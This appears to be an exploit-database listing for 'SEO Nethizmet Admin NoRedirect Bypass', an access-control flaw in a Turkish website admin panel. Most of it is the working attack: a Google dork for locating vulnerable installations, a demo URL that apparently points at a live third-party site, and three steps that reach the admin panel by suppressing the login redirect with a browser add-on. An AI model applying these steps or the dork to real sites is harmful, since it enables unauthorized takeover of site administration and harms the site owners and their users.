SEO Nethizmet Admin NoRedirect Bypass

2022.07.05
tr BQX (TR) tr
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

#Exploit Title: SEO Nethizmet Admin NoRedirect Bypass #Date: 27-06-2022 #Exploit Author: BQX (./Bertw_QX) #Google Dork: "inurl /yonetici/yonetici-giris.php" #Vendor Homepage: http://www.webdew.net/ #Category: NoRedirect #Tested On: Kali Linux - Cyberfox ### Demo : https://dijitalkitap.com/yonetim/yonetici-giris.php poc: 1) Open NoRedirect 2) Add "http://localhost/yonetici/yonetici-giris.php" and confirm 3) Open http://localhost/yonetici/index.php with Cyberfox browser ------That's it, you're in the admin panel.------ ********************************************************* #Email: bqxsecurity@protonmail.com *********************************************************


Vote for this issue:
100%
0%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2022, cxsecurity.com

 

Back to Top